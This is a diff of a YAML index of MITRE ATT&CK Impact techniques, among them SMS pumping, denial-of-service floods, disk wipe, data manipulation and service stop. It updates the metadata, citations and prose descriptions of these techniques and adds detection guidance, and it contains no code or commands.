+        description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+          25, 2024.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+      - source_name: GCP Storage Lifecycles
+        description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+          September 25, 2024.
+        url: https://cloud.google.com/storage/docs/lifecycle
+      - source_name: Azure Storage Lifecycles
+        description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+          policy. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+      - source_name: Palo Alto Cloud Ransomware
+        description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+          in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+          2024.'
+        url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+      - source_name: Datadog S3 Lifecycle CloudTrail Logs
+        description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+          S3 Lifecycle Rule. Retrieved September 25, 2024.
+        url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.003:
+    technique:
+      modified: '2024-10-16T17:45:14.210Z'
+      name: SMS Pumping
+      description: |-
+        Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+        Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
       type: attack-pattern
-      created: '2020-02-20T15:35:00.025Z'
+      id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+      created: '2024-09-25T13:53:19.586Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1499.003
-        url: https://attack.mitre.org/techniques/T1499/003
-      - source_name: Arbor AnnualDoSreport Jan 2018
-        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
-          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
-          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
-          Infrastructure Security Report. Retrieved April 22, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1496/003
+        external_id: T1496.003
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Twilio SMS Pumping
+        description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+          Stop It. Retrieved September 25, 2024.
+        url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+      - source_name: Twilio SMS Pumping Fraud
+        description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+          25, 2024.
+        url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1499.003:
+    technique:
+      modified: '2024-10-15T15:41:49.168Z'
       name: Application Exhaustion Flood
       description: 'Adversaries may target resource intensive features of applications
         to cause a denial of service (DoS), denying availability to those applications.
@@ -56774,13 +57531,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
 
         In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -56788,12 +57552,33 @@ impact:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      created: '2020-02-20T15:35:00.025Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1499/003
+        external_id: T1499.003
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: Arbor AnnualDoSreport Jan 2018
+        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+          Infrastructure Security Report. Retrieved April 22, 2019.
+        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1561:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-20T18:16:41.942Z'
       name: Disk Wipe
       description: |-
         Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
@@ -56854,109 +57639,79 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1565.001:
     technique:
+      modified: '2024-08-26T16:33:33.982Z'
+      name: Stored Data Manipulation
+      description: |-
+        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: Where applicable, inspect important file hashes, locations,
+        and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      - 'File: File Creation'
+      - 'File: File Deletion'
+      x_mitre_impact_type:
+      - Integrity
       type: attack-pattern
       id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
       created: '2020-03-02T14:22:24.410Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.001
         url: https://attack.mitre.org/techniques/T1565/001
+        external_id: T1565.001
       - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
         description: Department of Justice. (2018, September 6). Criminal Complaint
           - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
       - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
         description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
           November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
-        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Stored Data Manipulation
-      x_mitre_detection: Where applicable, inspect important file hashes, locations,
-        and modifications for suspicious/unexpected values.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'File: File Modification'
-      - 'File: File Creation'
-      - 'File: File Deletion'
-      x_mitre_impact_type:
-      - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1489:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
-      created: '2019-03-29T19:00:55.901Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1489
-        url: https://attack.mitre.org/techniques/T1489
-      - source_name: SecureWorks WannaCry Analysis
-        url: https://www.secureworks.com/research/wcry-ransomware-analysis
-        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
-          Analysis. Retrieved March 26, 2019.
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Novetta Blockbuster
-        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
-        description: 'Novetta Threat Research Group. (2016, February 24). Operation
-          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
-          25, 2016.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-12T15:57:27.380Z'
+      name: Service Stop
       description: "Adversaries may stop or disable services on a system to render
         those services unavailable to legitimate users. Stopping critical services
         or processes can inhibit or stop response to an incident or aid in the adversary's
         overall objectives to cause damage to the environment.(Citation: Talos Olympic
         Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
         this by disabling individual services of high importance to an organization,
-        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible
-        (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
-        many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible.(Citation:
+        Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+        all services to render systems unusable.(Citation: Talos Olympic Destroyer
         2018) Services or processes may not allow for modification of their data stores
         while running. Adversaries may stop services or processes in order to conduct
         [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
         for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
         of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Service Stop
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
 
@@ -56965,10 +57720,14 @@ impact:
         Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
 
         Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, <code>ChangeServiceConfigW</code> may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Process: Process Termination'
@@ -56979,39 +57738,37 @@ impact:
       - 'Service: Service Metadata'
       x_mitre_impact_type:
       - Availability
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+      created: '2019-03-29T19:00:55.901Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1489
+        external_id: T1489
+      - source_name: SecureWorks WannaCry Analysis
+        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+          Analysis. Retrieved March 26, 2019.
+        url: https://www.secureworks.com/research/wcry-ransomware-analysis
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Novetta Blockbuster
+        description: 'Novetta Threat Research Group. (2016, February 24). Operation
+          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+          25, 2016.'
+        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1489
     atomic_tests: []
   T1499.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
-      type: attack-pattern
-      created: '2020-02-20T15:37:27.052Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1499.004
-        url: https://attack.mitre.org/techniques/T1499/004
-      - source_name: Sucuri BIND9 August 2015
-        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
-        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
-          in the Wild. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T15:42:23.001Z'
       name: Application or System Exploitation
       description: "Adversaries may exploit software vulnerabilities that can cause
         an application or system to crash and deny availability to users. (Citation:
@@ -57029,13 +57786,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Attacks targeting web applications may generate logs in the
         web server, application server, and/or database server that can be used to
         identify the type of attack. Externally monitor the availability of services
         that may be targeted by an Endpoint DoS.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -57043,36 +57807,27 @@ impact:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1565.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
       type: attack-pattern
-      created: '2020-03-02T14:30:05.252Z'
+      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+      created: '2020-02-20T15:37:27.052Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.003
-        url: https://attack.mitre.org/techniques/T1565/003
-      - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-        url: https://content.fireeye.com/apt/rpt-apt38
-        source_name: FireEye APT38 Oct 2018
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1499/004
+        external_id: T1499.004
+      - source_name: Sucuri BIND9 August 2015
+        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+          in the Wild. Retrieved April 26, 2019.
+        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1565.003:
+    technique:
+      modified: '2024-10-15T18:21:43.760Z'
       name: Runtime Data Manipulation
       description: |-
         Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
@@ -57081,11 +57836,17 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Inspect important application binary file hashes, locations,
         and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'File: File Deletion'
@@ -57094,17 +57855,31 @@ impact:
       - 'File: File Creation'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - root
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+      created: '2020-03-02T14:30:05.252Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/003
+        external_id: T1565.003
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1498.002:
     technique:
-      modified: '2023-03-30T21:01:41.052Z'
+      modified: '2024-10-15T16:04:34.495Z'
       name: Reflection Amplification
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
@@ -57113,6 +57888,7 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
         before the traffic volume is sufficient to cause impact to the availability
         of the service, but such response time typically requires very aggressive
@@ -57128,17 +57904,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Sensor Health: Host Status'
       - 'Network Traffic: Network Traffic Flow'
@@ -57148,14 +57919,15 @@ impact:
       id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
       created: '2020-03-02T20:08:03.691Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1498/002
         external_id: T1498.002
-      - source_name: Cloudflare ReflectionDoS May 2017
-        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
-          (attacks). Retrieved April 23, 2019.
-        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       - source_name: Cloudflare DNSamplficationDoS
         description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
           April 23, 2019.
@@ -57164,28 +57936,28 @@ impact:
         description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
           April 23, 2019.
         url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+      - source_name: Cloudflare ReflectionDoS May 2017
+        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+          (attacks). Retrieved April 23, 2019.
+        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cloudflare Memcrashed Feb 2018
+        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
       - source_name: Arbor AnnualDoSreport Jan 2018
         description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
           Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
           into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
           Infrastructure Security Report. Retrieved April 22, 2019.
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-      - source_name: Cloudflare Memcrashed Feb 2018
-        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
-          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
-        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
-      - source_name: Cisco DoSdetectNetflow
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1499.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:05:48.014Z'
       name: Service Exhaustion Flood
       description: |-
         Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
@@ -57196,7 +57968,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -57207,17 +57978,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -57254,7 +58020,8 @@ impact:
